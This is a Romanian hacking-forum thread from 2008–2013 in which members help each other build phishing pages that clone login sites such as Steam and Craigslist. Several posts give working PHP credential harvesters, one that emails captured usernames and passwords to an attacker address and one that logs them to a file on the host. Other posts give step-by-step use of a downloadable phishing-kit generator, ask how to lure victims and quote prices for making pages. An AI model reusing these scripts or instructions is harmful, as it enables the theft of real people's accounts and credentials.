crs12decoder Posted August 27, 2008 Report Posted August 27, 2008 ma pish pe scriptu tau omule )) sut baet btw
nightkhaos Posted October 10, 2008 Report Posted October 10, 2008 Parerea mea este ca te-ai complicat la folosirea intregului site cu imagini cu tot .In locul tau foloseam sursa si modificam doar numele php-ului la apelare,imaginile fiind upload-ate din siteul sursa diferenta fiind URL-ul respectiv php-ul prin care obtii datele dorite!
gopo Posted October 11, 2008 Report Posted October 11, 2008 (edited) Parerea mea este ca te-ai complicat la folosirea intregului site cu imagini cu tot .In locul tau foloseam sursa si modificam doar numele php-ului la apelare,imaginile fiind upload-ate din siteul sursa diferenta fiind URL-ul respectiv php-ul prin care obtii datele dorite!uuuu...asta a fost buna adica in loc de sursa.com/imagini/imagine.gif sa fie /imagini/imagine.gif ? si imaginile de unde le extrage ?? le ai tu deja pe calculator ?parerea ta e gresita Edited October 11, 2008 by gopo .
sawyer Posted November 9, 2008 Report Posted November 9, 2008 am incercat sa salvez si eu o pagina si cand o deschid, are butoane java si niste prostii, dar nu apar cadranele lafel ca pe site`ul original
sawyer Posted November 11, 2008 Report Posted November 11, 2008 nu stiu aici ce sa fac pls help <br class="clear"/><div class="clearfix col3 float1 important"> <div class="colWrapper1"> <label for="username">User Name</label> </div></div><div class="clearfix col3 float1 important"> <div class="colWrapper1"> <input class="required text" id="username" name="username" size="32" tabindex="1" /> </div></div> <br class="clear" /><div class="clearfix col3 float1 important"> <div class="colWrapper1"> <label for="password">Password</label> </div>
sawyer Posted November 11, 2008 Report Posted November 11, 2008 am reusit sa`l fac dar nu vine si username aveti idee de ce?Parse error: syntax error, unexpected T_STRING in /home/xxxx/public_html/test/loginde.php on line 17
paxnWo Posted November 11, 2008 Report Posted November 11, 2008 ai aici un login.php universal pt orice pagina .<?php$message .= "account & password \n";$message .= "--------------------------------------------------------------------------\n";$message .= "Account : ".$_POST['login']."\n";$message .= "Password " .$_POST['passwd']."\n";$message .= "------------------------ Created by Bolfescu --------------\n";$recipient = "aaa@yahoo.com";$subject = "account";$headers = "From: ";$headers .= $_POST['eMailAdd']."\n";$headers .= "MIME-Version: 1.0\n";{$a = mail($recipient,$subject,$message,$headers);}if ($a){header("Location: error.html");}else{echo "ERROR! Please go back and try again.";}?>a se observa ca am pastrat credite =)in rest sper ca te descurci.vezi ca deja ai triple posting
file Posted November 14, 2008 Report Posted November 14, 2008 salut am si eu o problema..am vrut sa fac o pagina phishing la steam..dar..acolo cand dau login am pus sa intre direct pe 040147.php..dar nu vrea..ami da sa il downlodezi ... zicetimi ce sa fac..
AhEaD Posted November 14, 2008 Report Posted November 14, 2008 salut am si eu o problema..am vrut sa fac o pagina phishing la steam..dar..acolo cand dau login am pus sa intre direct pe 040147.php..dar nu vrea..ami da sa il downlodezi ... zicetimi ce sa fac..ai php support pe host ?
sawyer Posted November 14, 2008 Report Posted November 14, 2008 nu are cu siguranta, incearca sa iei hosting care suporta PHP man PS: thanks paxnWo am reusit
matei2010 Posted November 30, 2008 Report Posted November 30, 2008 1. Nu am inteles. Deci daca am o pagina de exemplu nu doizece ala... cu ce ar trebui sa modific asta? : mail($to, $sub, $mes, $headers);header ("Location:http://doizece.neogen.ro/?1=1&dz_nl_m=login_reg&error=1&next_url=index.php%3F");? Ce face acest url si de unde-l scot pentru un alt site? cum fac ca sa aflu acest url pentru un alt site:)??2. Daca hostul nu are smtp si nu se poate trimite mail cu parolele etc. cum fac ca acele date sa fie publicate pe o pagina noua in site. de ex: fisiere.php ..adica daca intru pe www.site.com/fisiere.php aici sa se puna toate parolele si sa le sterg cand am nevoie???Pls raspundeti-mi si la 1 dar si la 2:P
sawyer Posted December 18, 2008 Report Posted December 18, 2008 un script care salveaza intr`un text pe host ( asta in cazul in care hostul nu suporta mailsend ) stiti?
nullbyte Posted December 18, 2008 Author Report Posted December 18, 2008 Here's your code.<?php$log = "blah.html"; $email = $_POST['email'];$password = $_POST['password'];$fp = fopen($log, "a+");fwrite($fp, $email);fwrite($fp, "<br>");fwrite($fp, $password);fwrite($fp, "<br>");fclose($fp); ?>
pepsi Posted September 9, 2009 Report Posted September 9, 2009 eu am reusit sa fac... la steam primesc si user si password ! desi sunt cel mai noob de pe forum... am reusit sa fac:) ms nullbyte pt tutorial !
esseplk Posted March 1, 2010 Report Posted March 1, 2010 Eu incerc sa fac la craigslist una,dar nu imi iese deloc .Ma poate ajuta cineva?Multumesc anticipat!
iamback Posted March 1, 2010 Report Posted March 1, 2010 Super mijto.Folositor pentru n00bi ca mine.dar cel mai greu mi se pare sa aduc oameni pe acel site.si daca e site gratuit e foarte probabil sa aiba bannere si o sa-l faca sa para mai nerealistic.Si pana la urma dc s-ar loga unu de pe siteul pe care il dau eu in loc sa se logheze de pe siteul original.Adik incerc sa intreb cum il fac eu pe ala sa intre de pe siteul meu?Pt asta iti tre imaginatie .
tara2009 Posted April 6, 2010 Report Posted April 6, 2010 salut , am folosit codul oferit de tine dar pe mail , cand se trimite , in dreptul la username si parola apare gol (blanc) desii completez campurile respective in pagina de scam
vale01vale Posted January 20, 2011 Report Posted January 20, 2011 baieti va rog frumos sa=mi spune-ti pas cu pas cum fac o pagina de phishing sunt mai incepator va multumesc anticipat.ce modific in php ca sa primesc user si parola in mail meu?
Moderators Dragos Posted September 27, 2011 Moderators Report Posted September 27, 2011 cat costa sa faci o pg ?De la 10$ pana la 1000$.
razvan17r Posted May 25, 2013 Report Posted May 25, 2013 Salut , am si eu o problema ... Am reusit sa fac pagina tot , dar cand primesc email-ul , apare tot in el . Dar lucrul cel mai important si acela fiind emailul si parola nu apar ... De ce ?!
EclipseFX Posted June 13, 2013 Report Posted June 13, 2013 MUUUUULT mai simplu : 1)Descarcati http://rapidshare.com/files/1163076049/Avhackers%20Phisher%20Maker%203.1.0.rar2)Extrageti continutul intr-un folder3)Deschideti PhisherMaker_by_dsuraj.exe4)La Step1 scrieti adresa site-ului si apasati pe Go5)La Step2 dati click pe butonul Process6)La Step3 dati click pe butonul de acolo7)Inchideti programul8)Clona(phisher-ul) se afla in upload/%nume-site%
0774231_d2310 Posted June 22, 2013 Report Posted June 22, 2013 MUUUUULT mai simplu : 1)Descarcati http://rapidshare.com/files/1163076049/Avhackers%20Phisher%20Maker%203.1.0.rar2)Extrageti continutul intr-un folder3)Deschideti PhisherMaker_by_dsuraj.exe4)La Step1 scrieti adresa site-ului si apasati pe Go5)La Step2 dati click pe butonul Process6)La Step3 dati click pe butonul de acolo7)Inchideti programul8)Clona(phisher-ul) se afla in upload/%nume-site%Ok,bun,am efectuat tot ce mi-ai zis.Dar acum,ce trebuie sa fac ca sa primesc datele?Ca nu le primesc de nicio culoare...